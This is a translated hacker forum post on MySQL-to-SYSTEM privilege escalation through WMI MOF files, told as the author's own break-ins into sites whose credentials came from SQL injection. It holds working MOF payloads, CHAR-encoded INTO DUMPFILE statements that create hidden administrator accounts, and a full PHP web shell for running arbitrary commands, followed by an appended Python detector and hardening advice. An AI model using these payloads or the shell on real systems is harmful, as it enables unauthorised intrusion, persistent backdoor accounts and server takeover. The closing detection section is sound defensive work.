A MOF privilege escalation primer


Today, while taking another site, I ran into a lot of problems. I'll skip the takeover itself; it needed MOF privilege escalation, and whether or not the escalation works, here is a primer on MOF escalation.

Here I have put together several kinds of MOF escalation write-ups.

First, a detailed walk-through of remote MySQL MOF escalation when you have no shell.

That is, you got the database's root account and password through injection and go straight from there.

Found an injectable site by scanning.

In havij, got the database password stored in the mysql schema of the MySQL database:

Sometimes version 1.15 is still the most usable and most stable, even if it is a bit slower.
As usual, posted it on the forum and let the guys crack it.

Thanks to Mr.Lu. Side gripe: cmd5 charges even for a root hash...
While waiting for the password to crack, ran nmap.

Unexpectedly found the port had been moved to 1126, which saved a lot of time later on.
Tried a remote connection as usual.

Someone in the previous post asked what this tool is: I use navicat, and it works well.
The usual approach now is to get the absolute path, write a small webshell and penetrate further.
But the site would not leak a path, so look at MySQL's path instead;
select @@basedir; shows it:

The site path is probably similar, but I could not be bothered to try them one by one. MOF escalation has been popular lately; it failed for me last time, so let's try it again.
There are plenty of MOF primers.

The mof file content is:

#pragma namespace("\\\\.\\root\\subscription")

// Filter: fires on the Win32_LocalTime modification event whose Second field is 5
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

// Consumer: JScript run through WScript.Shell
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};

// Binding: ties the filter to the consumer, making the subscription permanent
instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};

 

Since I had no webshell, I could not first upload a mof the way the netdisk document says, so I wrote it in one go.
First I tried writing the original statement in directly; it failed, because the statement is full of ';' and newline characters.
So I thought of converting it to hex or ASCII codes.
Tried hex first.
Waited forever and still could not log in, so gave up and switched to ASCII codes. The SQL statement used was:

 

SELECT CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO DUMPFILE 'c:/windows/system32/wbem/mof/nullevt.mof';


Only then did I notice a problem: the statement above only adds a user; I forgot to make it an administrator...
Fine, rewrite the mof.

 

select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

 

Done; this way I logged in fine.

Some other day I'll look into adding the administrator in one go.

By default it will still add the user again every 5 s; the fix is:
First, net stop winmgmt to stop the service,
Second, delete the folder C:\WINDOWS\system32\wbem\Repository\
Third, net start winmgmt to start the service again
Other methods are written up in the netdisk files.

It all looks smooth because I researched this last time; this time I wrote it up in more detail.

 

 

Second method

 

First of all, thanks to 米爺 for scolding some sense into me while I was working on this.

No more talk; it is what the title says.

First, a friend threw me a shell.

He was bad at privesc so handed it over to me; a quick look showed it was a PHP script, and PHP means MySQL.

Out of habit I looked in the data folder under the web root.

Good luck: root.

Knowing what this is, upload a big webshell (not sure how to do it with 菜刀).

OK, the output came back.

5.0.67 needs no explanation; this version can basically be owned in seconds with UDF, but since this is about MOF, escalate with MOF.

First find a writable path.

The C: drive works, good luck.

Then upload our mof file to the upload path.

The code is as follows:

#pragma namespace("\\\\.\\root\\subscription")

// Filter: fires on the Win32_LocalTime modification event whose Second field is 5
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

// Consumer: JScript run through WScript.Shell
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user user$ sword /add & net localgroup administrators user$ /add\")";
};

// Binding: ties the filter to the consumer, making the subscription permanent
instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};

Generated account: user$, password: sword

You can modify this code yourself.

Then run the command: select load_file('C:\\RECYCLER\\xx.mof') into dumpfile 'c:/windows/system32/wbem/mof/xx.mof';

OK. Command executed.

Because of the permission settings I could not query the administrators group directly; logging in shows it.

That's MOF escalation.

Thanks for reading.

PS: I only took a few screenshots at the time, and the admin later fixed the mof vulnerability, so the server is gone. That's it.

Summary

You can also use a mof webshell directly for escalation,

but mine keeps getting flagged by AV.

The code is below; save it as mof.php and that's it.

When running it, click Read, and run it several times: no output from Read means it has not run successfully yet; if there is an error, it does show output.

<?php
// Win MOF Shell (uses the legacy mysql_* extension, PHP 5 only).
// Connects to MySQL, writes a MOF into the wbem\mof directory that the WMI
// service on XP / 2003 compiles automatically; the consumer runs the command
// and redirects its output to $path, which is read back with load_file().
$path = "c:/windows/system32/canimei";
session_start();
if (!empty($_POST['submit'])) {
    setcookie("connect");
    setcookie("connect[host]", $_POST['host']);
    setcookie("connect[user]", $_POST['user']);
    setcookie("connect[pass]", $_POST['pass']);
    setcookie("connect[dbname]", $_POST['dbname']);
    echo "<script>location.href='?action=connect'</script>";
}
if (empty($_GET["action"])) {
?>
<html>
<head><title>Win MOF Shell</title></head>
<body>
<form action="?action=connect" method="post">
Host:<input type="text" name="host" value="192.168.200.144:3306"><br/>
User:<input type="text" name="user" value="root"><br/>
Pass:<input type="password" name="pass" value="toor"><br/>
DB:<input type="text" name="dbname" value="mysql"><br/>
<input type="submit" name="submit" value="Submit"><br/>
</form>
</body>
</html>
<?php
exit;
}
if ($_GET['action'] == 'connect') {
    $conn = mysql_connect($_COOKIE["connect"]["host"], $_COOKIE["connect"]["user"], $_COOKIE["connect"]["pass"])
        or die('<pre>' . mysql_error() . '</pre>');
    $strCmd = isset($_POST['cmd']) ? $_POST['cmd'] : '';
    echo "<form action='' method='post'>";
    echo "Cmd:";
    echo "<input type='text' name='cmd' value='$strCmd'>";
    echo "<br>";
    echo "<br>";
    echo "<input type='submit' value='Exploit'>";
    echo "</form>";
    echo "<form action='' method='post'>";
    echo "<input type='hidden' name='flag' value='flag'>";
    echo "<input type='submit' value=' Read '>";
    echo "</form>";
    if (isset($_POST['cmd'])) {
        $cmdshell = 'cmd /c ' . $strCmd . '>' . $path;
        $mofname = "c:/windows/system32/wbem/mof/system.mof";
        // Backslashes are escaped twice: once for the PHP string, once for the MySQL string literal.
        $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")instance of __EventFilter as \$EventFilter{  EventNamespace = \"Root\\\\\\\\Cimv2\";  Name  = \"filtP2\";  Query = \"Select * From __InstanceModificationEvent \"      \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"      \"And TargetInstance.Second = 5\";  QueryLanguage = \"WQL\";};instance of ActiveScriptEventConsumer as \$Consumer{  Name = \"consPCSV2\";  ScriptingEngine = \"JScript\";  ScriptText =  \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; };instance of __FilterToConsumerBinding{  Consumer = \$Consumer;  Filter = \$EventFilter;};";
        mysql_select_db($_COOKIE["connect"]["dbname"], $conn);
        $sql1 = "select '$payload' into dumpfile '$mofname';";
        if (mysql_query($sql1))
            echo "<hr>Execute Successful!<br> Please click the read button to check the result!!<br>If the result is not correct,try read again later<br><hr>";
        else
            die(mysql_error());
        mysql_close($conn);
    }
    if (isset($_POST['flag'])) {
        // Read back whatever the command wrote to $path.
        $conn = mysql_connect($_COOKIE["connect"]["host"], $_COOKIE["connect"]["user"], $_COOKIE["connect"]["pass"])
            or die('<pre>' . mysql_error() . '</pre>');
        $sql2 = "select load_file(\"" . $path . "\");";
        $result2 = mysql_query($sql2);
        while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {
            echo "<hr/>";
            echo '<pre>' . $row[0] . '</pre>';
        }
        mysql_close($conn);
    }
}
?>
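As an added example from the defender's side (not code from the original post or from any of the write-ups it collects), here is a Python triage helper for statements taken from a MySQL general/query log. It decodes the CHAR()-encoded SELECT ... INTO DUMPFILE form used in the first write-up, also handles the plain-quoted form that mof.php above sends, and checks the decoded text for the __EventFilter / ActiveScriptEventConsumer / __FilterToConsumerBinding triple that makes the subscription permanent, pulling out the script the consumer would run. It goes slightly beyond the post in also recognising CommandLineEventConsumer, the other common consumer class. The sample query is constructed here by re-encoding the post's own first MOF; the function names and the benign / file_write / wmi_persistence verdicts are my own. Note that the post's filter matches Win32_LocalTime modifications whose Second field equals 5, so it fires once per minute until the filter, consumer and binding are removed from root\subscription (or the winmgmt repository is reset as in the first write-up).

```python
"""Triage helper for a MySQL query log on Windows: pull apart SELECT ... INTO
DUMPFILE/OUTFILE statements, decode CHAR()-encoded payloads and flag writes that
plant a WMI permanent event subscription (filter + consumer + binding)."""
import re

# Directory the WMI service on Windows XP / Server 2003 watches and compiles
# automatically; later Windows versions no longer auto-compile this directory.
MOF_AUTOCOMPILE_DIR = "windows/system32/wbem/mof"

CHAR_CALL_RE = re.compile(r"\bCHAR\s*\(\s*([0-9\s,]+)\)", re.IGNORECASE)
DUMPFILE_RE = re.compile(r"INTO\s+(?:DUMPFILE|OUTFILE)\s+'([^']*)'", re.IGNORECASE)
QUOTED_PAYLOAD_RE = re.compile(r"SELECT\s+'((?:[^'\\]|\\.)*)'\s+INTO",
                               re.IGNORECASE | re.DOTALL)
# The three pieces of a permanent subscription, plus the namespace pragma.
MOF_INDICATORS = {
    "subscription_namespace": re.compile(
        r'#pragma\s+namespace\s*\(\s*"[^"]*root\\+subscription"', re.IGNORECASE),
    "event_filter": re.compile(r"instance\s+of\s+__EventFilter\b", re.IGNORECASE),
    "consumer": re.compile(
        r"instance\s+of\s+(?:ActiveScript|CommandLine)EventConsumer\b", re.IGNORECASE),
    "binding": re.compile(r"instance\s+of\s+__FilterToConsumerBinding\b", re.IGNORECASE),
}
# What the consumer would run: a script body or a command line template.
PAYLOAD_FIELD_RE = re.compile(
    r'(?:ScriptText|CommandLineTemplate)\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);')
MOF_STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')


def decode_char_list(arg: str) -> str:
    """Reverse MySQL CHAR(n1,n2,...): one byte per value, read back as Latin-1
    so every byte 0-255 round-trips (values above 255 raise ValueError)."""
    values = [int(v) for v in arg.split(",") if v.strip()]
    return bytes(values).decode("latin-1")


def extract_payload(sql: str) -> str:
    """Return the literal a SELECT ... INTO statement writes: a CHAR() list
    (as in the post) or a plain quoted string (as sent by mof.php)."""
    m = CHAR_CALL_RE.search(sql)
    if m:
        return decode_char_list(m.group(1))
    m = QUOTED_PAYLOAD_RE.search(sql)
    return m.group(1) if m else ""


def analyse_mof(mof: str) -> dict:
    """Look for the filter/consumer/binding triple in MOF text and pull out the
    script or command the consumer would execute."""
    found = {name: bool(rx.search(mof)) for name, rx in MOF_INDICATORS.items()}
    found["persistent_subscription"] = all(
        found[k] for k in ("event_filter", "consumer", "binding"))
    found["payload"] = ""
    m = PAYLOAD_FIELD_RE.search(mof)
    if m:
        # MOF concatenates adjacent string literals; undo the \" and \n escapes.
        joined = "".join(MOF_STRING_RE.findall(m.group(1)))
        found["payload"] = joined.replace('\\"', '"').replace("\\n", "\n")
    return found


def audit_query(sql: str) -> dict:
    """Classify one logged statement as benign, file_write or wmi_persistence."""
    report = {"verdict": "benign", "target": "", "targets_mof_dir": False, "mof": {}}
    m = DUMPFILE_RE.search(sql)
    if not m:
        return report
    target = m.group(1).replace("\\", "/").lower()
    report["target"] = target
    report["targets_mof_dir"] = MOF_AUTOCOMPILE_DIR in target
    report["mof"] = analyse_mof(extract_payload(sql))
    hostile = report["targets_mof_dir"] or report["mof"]["persistent_subscription"]
    report["verdict"] = "wmi_persistence" if hostile else "file_write"
    return report


# Constructed sample: the post's first MOF (user-add variant), re-encoded the
# way the post does it, as a CHAR() list written with INTO DUMPFILE.
SAMPLE_MOF = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};
'''
SAMPLE_QUERY = "SELECT CHAR({}) INTO DUMPFILE 'c:/windows/system32/wbem/mof/nullevt.mof';".format(
    ",".join(str(b) for b in SAMPLE_MOF.encode("latin-1")))
```

Run audit_query over every statement in the log; a wmi_persistence verdict on a host where mysqld runs as SYSTEM and secure_file_priv is empty is exactly the condition the post exploits. Setting secure_file_priv to a dedicated directory and running mysqld under a low-privilege account removes the write path into wbem\mof; on the host itself, the same three classes can be enumerated in the root\subscription namespace, which is the check to run after the winmgmt cleanup from the first write-up.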

